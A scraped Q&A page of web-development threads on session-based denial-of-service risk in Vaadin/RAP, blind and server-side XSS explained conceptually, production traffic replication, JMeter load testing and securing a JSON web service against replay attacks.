Vaadin and Eclipse RAP/RWT are web application frameworks with - as far as I understand - similar architecture. My question is if an application built with Vaadin or RAP is prone to denial of service attacks? I am currently evaluating the frameworks and want to be sure that this is not a concern.
Here is my reasoning:
With Vaadin or RAP you don't build HTML output but instead construct a Widget tree similar to an Swing/SWT application (in case of RAP it is SWT). The frameworks renders the widget tree as HTML in the browser, and sends user interactions back to the server, where the application gets notified in terms of events. The events are delivered to listener objects, which have previously been registered on widget.
Therefore the widget tree must be kept in some sort of user session and of course consumes some memory.
If the application is public (i.e. does not sit behind a login page), then it seems that there is a possible denial of service attack for such an application:
Just fire requests to the apps landing page, and probably fake a first response. For any such request, the framework will build a new widget tree, which will live some time on the server, until the session expires. Therefore the server memory should be filled with tangling users sessions very soon.
Or did these frameworks invent protection against this scenario?
Thanks.
A framework only can not protect you from DoS attacks.
Vaadin has some features built in to prevent attacks, but of course these features depend on how you code your application.
There is a long webinar about vaadin security:
https://vaadin.com/de/blog/-/blogs/vaadin-application-security-webinar
Vaadin does some validation of the client<->server traffic
to prevent XSS and other attacks.
But when you do some special things, you can open doors for such attacks.
As for the scenario you described:
The initial vaadin session takes some memory on the server (Just as all other sessions on any server)
How large this memory footprint is, depends on the initial number of widgets and what you load in memory for this. (DB connections etc.)
Usually this is not a problem when you have a very lightweight login page
But if you display large tables and many other fancy things, then you will have to have enough memory for the number of requests. (The same apply to all othe http servers/applications, they also need memory for this)
If the number of requests surpasses the capacity of your server, any web service can be brought down in a DoS attack
EDIT:
Due to good points in Andrés answer I want to sharpen my question.
First of all, of course I agree, if you put an application behind a login-wall
then the DOS-threat is not that big. At least you can identify the attacking user. And the login page itself can
be lightweight or even must not be implemented with Vaadin/RAP.
And as Vaadin/RAP applications are most likely used in RIA-style intranet settings then the DOS scenario does not invalidate
their use in these settings.
But at least both frameworks itself expose demo pages without logins on the internet:
See http://www.eclipse.org/rap/demos/ and http://demo.vaadin.com/dashboard/
These are not simple pages, and probably use quite a bit of memory.
My concern is about such a scenario, a non access-restricted internet page:
Once these frameworks responded to a request, they must keep serverside memory for that request for quite some time
(say the classical 30 minutes of a HTTP session, at least in minute scale).
Or to express it differently, if the application retains memory per intial user request for some substantial time it will be
prone to DOS attacks.
Contrast this with an old-style roundtrip web application which does not require user identification.
All the information needed to decide what to return is contained in the request (path, parameters, http-method, ...),
so a stateless server is possible.
If the user interacts with such an application, the application is still free to store session-persistent data on the client
(shopping cart contents in a cookie, etc.).
Related
There is something i wonder. I am giving an example of XSS. We say it is divided into 3 types. Blind, Reflected and stored. There is no one who does not know reflected and stored. We say that the attacker is not informed about the vulnerable with a blind at the beginning of it's name, but if there is no information, how does the attacker understand that there is any vulnerable?
Thank you from now.
In blind XSS the attacker typically doesn't know if his attack will succeed at first.
You can think of it like setting up a trap. You don't know if it will succeed, or if the victim has protection, you are blind.
Actually, blind XSS vulnerabilities are a variant of stored (persistent) XSS vulnerabilities. The attacker's input is saved by a web server and then executed as a malicious script in another application or in another part of the application.
For example, an attacker injects a malicious payload into a contact/feedback form and POST it (setting up a trap). Let's say the info sent is then served by another application or in another part of the app:
The admin is opening his admin panel/dashboard to view feedback from his users. When the administrator of the application is reviewing the feedback entries - the attacker’s payload will be loaded and executed.
The attacker was blind - he didn't know if the server side of that form sanitize the input, or if the "admin panel" of the application has any protection against JS execution.
Example of web applications and web pages where blind XSS attacks can occur:
Contact/Feedback pages
Log viewers
Exception handlers
Chat applications / forums
Customer ticket applications
Web Application Firewalls
Any application that requires user moderation
In the case of blind XSS, the payload can be executed after a long period of time when the administrator visits the vulnerable page. It can take hours, days, or even weeks until the payload is executed.
Therefore, this type of vulnerability is much harder to detect compared to other reflected XSS vulnerabilities where the input is reflected immediately.
I want to replicate web traffic from production server to another instance of the application (pre-production env), so that i can verify that any improvements (e.g. performance-wise) that were introduced (and tested on course), remain improvements in the context of production-like load.
(Obviously, something that is clearly a performance improvement during tests, might as well turn out not quite so on the production. For example when trading time vs memory usage.)
There are tools like
teeproxy (https://serverfault.com/questions/729368/replicating-web-application-traffic-to-another-instance-for-testing, https://github.com/chrislusf/teeproxy/blob/master/teeproxy.go)
duplicator (Duplicate TCP traffic with a proxy, https://github.com/agnoster/duplicator)
but they don't seem to address the fact, that the duplicated web traffic will get
different session cookies
different CSRF tokens (in my case this is covered by JSF view state ids)
Is there a tool that could do that, automatically?
I had a similar concern and opened an issue here
Also since it is an open project I wanted to see if i can inject my own logic.
I am stuck there :- Adding headers to diffy proxy before multicasting
I dont have enough reputation to comment so added an answer
Twitter's diffy is specialized to duplicate HTTP traffic.
As a newbie to JMeter, I have created some scenarios like some number of users are logging in to the system, sending some HTTP Request, Requests are looped, etc.
I would like to know what are the real world scenarios implemented by Companies to Performance test their System using JMeter.
Consider a E-Commerce Website and what all scenarios they might consider to performance test their Website?
The whole idea of performance testing is generating a real life load to the system simulating real users as close as possible. In regards to E-commerce system it would be something like:
N users searching for some term
M users browsing and navigating
X users making purchases
To simulate different usage scenarios you can use different thread groups or set weight using Throughput Controller
To make your JMeter test looking more like a real browser add the following test elements to your test plan:
HTTP Cookie Manager - to represent browser cookies, simulate different unique sessions and deal with cookie-based authentication
HTTP Cache Manager - to simulate browser cache. Browsers download embedded resources like images, scripts, styles, etc. but to it only once. Cache Manager replicates this behavior and also respects cache control headers.
HTTP Header Manager - to represent browser headers like User-Agent, Accept-Language and so on.
Also according to How to make JMeter behave more like a real browser you need to "tell" JMeter to retrieve all embedded resources from pages and use concurrent thread pool from 3 to 5 threads for it. The best place to put this config in is HTTP Request Defaults.
Hi an XSS attack is treated as an attack from the client's machine. But is there any way to make an XSS attack over the server ?
I want to know is there any way to execute a code on the server using the client side interface like in the case of SQL Injection, but here it is not the Database Server but a Simple Web Server or an Application Server.
Sometimes, it's also possible to use XSS as a vector to trigger and leverage Cross-Site Request Forgery (CSRF) attacks.
Having an XSS on a website is like having control on the javascript a user will execute when visiting it. If an administrator stumbles upon your XSS code (either by sending a malicious link or by means of a stored XSS), then you might get him or her to execute requests or actions on the webserver that a normal user usually wouldn't have access to. If you know the webpage layout well enough, you can request webpages on the visitor's behalf (backends, user lists, etc.), and have the results sent (exfiltrated) anywhere on the Internet.
You can also use more advanced attack frameworks such as BeEF to attempt to exploit vulnerabilities in your visitor's browser. If the visitor in question is a website administrator, this might yield interesting information to further attack the webserver.
XSS per se won't allow you to execute code on the server, but it's a great vector to leverage other vulnerabilities present on the web application.
Vulnerabilities like XSS or SQL injection are specific instances of a more general problem: Improperly concatenating attacker-controllable text into some other format (eg, SQL, HTML, or Javascript)
If your server runs any such format (eg, eval()), it can have similar vulnerabilities.
The answer to your question is not entirely straightforward.
Specifically, no you cannot attack a server using XSS by by injecting code through its interface.
However, there are ways to "inject" code into the server through its interface and have the server run it. The techniques vary widely and substantially, and are highly implementation dependent.
For example, there was a web application that allowed users to upload image files for display. The web application had code that "touched up" the image. There was a vulnerability in the touch up code. A malicious user uploaded a carefully prepared, malicious .jpg file that overflowed a buffer in the code and shoveled off a shell to the attacker's machine. In a case like this, the attack was conducted by "injecting" code into the web app through its interface.
As long as you never process user input (other than storing it in the DB and returning it to other users), then you should be pretty safe from this type of attack. Probably 99% of web apps need to be much more worried about XSS attacks from users to other users than from code injection attacks against themselves.
I am architecting a project which uses jQuery to communicate with a single web service hosted inside sharepoint (this point is possibly moot but I include it for background, and to emphasize that session state is not good in a multiple front end environment).
The web services are ASP.Net ASMX services which return a JSON model, which is then mapped to the UI using Knockout. To save the form, the converse is true - JSON model is sent back to the service and persisted.
The client has unveiled a requirement for confidentiality of the data being sent to and from the server:
There is data which should only be sent from the client to the server.
There is data which should only appear in specific views (solvable using ViewModels so not too concerned about this one)
The data should be immune from classic playback attacks.
Short of building proprietary security, what is the best way to secure the web service, and are there any other libraries I should be looking at to assist me - either in JavaScript, or .Net
I'll post this as an answer...for the possibility of points :)...but I don't know that you could easily say there is a "right way" to do this.
The communications sent to the service should of course be https. That limits the man-in-the-middle attack. I always check to see that the sending client's IP is the same as the IP address in the host header. That can be spoofed, but it makes it a bit more annoying :). Also, I timestamp all of my JSON before send on the client, then make sure it's within X seconds on the server. That helps to prevent playback attacks.
Obviously JavaScript is insecure, and you always need to keep that in mind.
Hopefully that gives you a tiny bit of insight. I'm writing a blog post about this pattern I've been using. It could be helpful for you, but it's not done :(. I'll post a link sometime tonight or tomorrow.